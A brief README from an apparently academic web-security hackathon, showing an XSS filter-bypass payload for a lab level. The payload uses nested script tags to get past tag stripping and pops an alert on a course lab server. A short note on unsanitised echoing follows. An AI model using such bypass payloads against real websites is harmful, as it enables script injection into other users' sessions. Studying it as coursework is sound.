gaddiat/waph-gaddiat/hackathons/hackathon1/README.md

 <http://waph-hackathon.eastus.cloudapp.azure.com/xss/level3/echo.php?input=%3Csc%3Cscript%3Eript%3Ealert(%27level-3%20hacked%20by%20Amit%20Gaddi%27)%3C/sc%3C/script%3Eript%3E>

 Code guess - The issue in echo.php is that it does not validate or sanitize input.
 The script simply echoes user-supplied input without filtering, allowing malicious users to inject arbitrary HTML and JavaScript code, resulting in a Cross-Site Scripting (XSS) vulnerability.
+In short the script tag will be removed.

 ```js
 <input><script>alert('level-3 hacked by Amit Gaddi')</script>